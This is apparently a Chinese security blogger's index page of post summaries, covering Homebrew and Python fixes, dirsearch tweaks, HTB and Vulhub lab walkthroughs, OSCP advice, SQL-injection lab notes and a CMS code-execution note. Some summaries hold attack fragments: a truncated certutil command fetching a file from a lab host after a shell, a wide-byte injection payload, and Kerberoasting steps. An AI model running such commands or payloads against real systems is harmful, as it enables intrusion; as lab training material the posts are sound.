摘要:
https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz 阅读全文
摘要:
直接使用下面的命令即可 /bin/zsh -c "$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)" 阅读全文
摘要:
解决python写入中文乱码问题: 添加encoding='utf-8-sig' with open('result.csv', 'w', encoding='utf-8-sig', newline='') as f: writer = csv.writer(f) writer.writerows( 阅读全文
摘要:
如图所示 dirsearch输出重定向到日志文件时 会将这些字典文件里的字符串遍历过程挨个输出到重定向 严重影响可读性 解决方案是注释掉lib/controller/Controller.py文件的459行 输出结果简洁多了,当然可再配合-x参数过滤掉405这些无用信息 阅读全文
摘要:
总结: 此台机器为域渗透类型,内容十分精彩 平时很难碰到这么好的环境 真的是学到了很多干货 。 强烈推荐做完 。 步骤: samba获取文件 > 获取用户列表 > 枚举用户得到TGT > hashcat解密TGT > rpcclient枚举权限 > SeBackupPrivilege和SeResto 阅读全文
摘要:
nmap dirsearch 看到CMS框架 bing一下 https://www.exploit-db.com/exploits/48506 down下来执行就拿到shell了。。 但是在这个shell下执行certutil.exe -urlcache -split -f http://10.10 阅读全文
摘要:
Nmap 看到1 ftp允许匿名访问,2 80开放,3 111,135,139,445,2049开放, 先看下ftp,空目录 且无写入权限 Enum4linux枚举为空, smbclient也是报错, showmount出来了 挂载,站点文件出来了,这个看目录名称应该是备份目录否则直接试试上传后门了 阅读全文
摘要:
看了很多文章 好像这个报错的原因不一样,这儿写下个人的原因及解决方案 个人为aliyun vps ubuntu16.04,不知为何默认安装了python3.8 且默认的python环境是3.8的而非正常的3.5版本,这个倒无所谓,但是pip3默认是8.1的就比较奇怪了 我的解决方案是升级了pip3的 阅读全文
摘要:
说到GPG就必须先要说一下PGP(Pretty Good Privacy),它们都是OpenPGP标准的具体软件实现。上世纪90年代初 Phil Zimmermann 开发了PGP,用以保护个人和商业机构数据的隐私,很快就受到了普遍的欢迎和采用。 但有一个问题,PGP是个商业软件,据说价格还挺贵(我 阅读全文
摘要:
###总结: 此lab设计了很多场景,但是个人测试时未按照其规划思路来只是验证出有漏洞即可,做完后个人的感悟就是 非常累,很多题目都是简单的替换单引号,双引号,双引号加括号这类,纯粹体力活。 其中个人认为有价值做的题目是24,26,27,32,34,仅此而已。 注意一点是post型宽字节注入需要在b 阅读全文
摘要:
utf16的单引号乱码,用于post型宽字节注入/主要是在hackbar下使用: �' 在burpsuite里注入时直接使用%df吃掉%5c即可 阅读全文
摘要:
vuhub Tr0ll官方下载地址 首先netdiscover nmap 发现ftp可匿名登录 robots.txt有目录 首先ftp进去看有什么东西 发现是一个pcap包,下载下来看看里面有啥敏感流量 分析流量包前先看下网页, 首页一张图 输入/secret目录还是一张图,看了下请求包也没啥发现 阅读全文
摘要:
看很多人会纠结国内连接oscp网络的问题,频繁纠结哪个vpn好,稳不稳定,折腾来折腾去浪费时间,碰到某些节日时仍可能导致vpn连接不上或者网速不理想。这儿分享下我的解决方案:使用阿里云东京vps 阿里云东京vps,1核1G20G硬盘一个月大概60元,带宽选择50M按量付费(6毛钱一G),我个人使用一 阅读全文
摘要:
oscp中包含一台25分的缓冲区溢出漏洞靶机,题目相对简单主要是以思路考察为主,是oscp必拿的分数。这儿写下相关的思路步骤。 考试时会给两台机器,一台实验机供考生调试程序,上面有immunity debugger 和漏洞程序,还有一台正式靶机,两台环境参数一模一样。考生只需要在实验机上调试好程序然 阅读全文
摘要:
Vulhub-Lord_Of_The_Root1.0.1靶机官方地址 Netdiscover Nmap 发现只开了22端口,openssh版本6.6.1p1, 记得openssh有个枚举用户名的漏洞,尝试枚举和爆破密码, 枚举报错了,但是发现了线索。 红框中翻译:魔戒 敲击进入 没猜错的话这个是考察 阅读全文
摘要:
msf运行ruby脚本报/usr/lib/ruby/2.7.0/rubygems/dependency.rb:311:in `to_specs': Could not find 'rex-text' (>= 0) among 78 total gem(s) (Gem::MissingSpecErro 阅读全文
摘要:
原文及处理脚本在这儿 【99w】 /SSRF漏洞利用与getshell实战 【95w】 /HTB-Craft 一次从git入手的渗透练习 【83w】 /HTB靶机 Bastard 【85w】 /Windows内网协议学习LDAP篇之域权限下 【82w】 /Windows内网协议学习LDAP篇之域权限 阅读全文
摘要:
原文及处理脚本在这儿 【81w】 /CSRF攻击防御原理 【79w】 /流量加密又怎样? 多种姿势检测“冰蝎” 【127w】 /泛微OA E-cology远程代码执行漏洞原理分析 【93w】 /梦里参加攻防演习活动的过程分享(上) 【235w】 /全程带阻:记一次授权网络攻防演练(上) 【72w】 阅读全文
摘要:
采集了vulhub漏洞环境库上的README,做了一份标题汇总,方便测试时直接查看。 处理脚本在这儿 # ActiveMQ 反序列化漏洞(CVE-2015-5254) # ActiveMQ任意文件写入漏洞(CVE-2016-3088) # AppWeb认证绕过漏洞(CVE-2018-8715) # 阅读全文
摘要:
youdianCMS官方地址 ####一 代码执行漏洞 在后台模板处修改任意模板添加php代码即可执行。 youdiancms8.0\App\Core\Lib\Template\ThinkTemplate.class.php 97行,其使用include包含了模板文件 证明: 在后台模板管理处写入p 阅读全文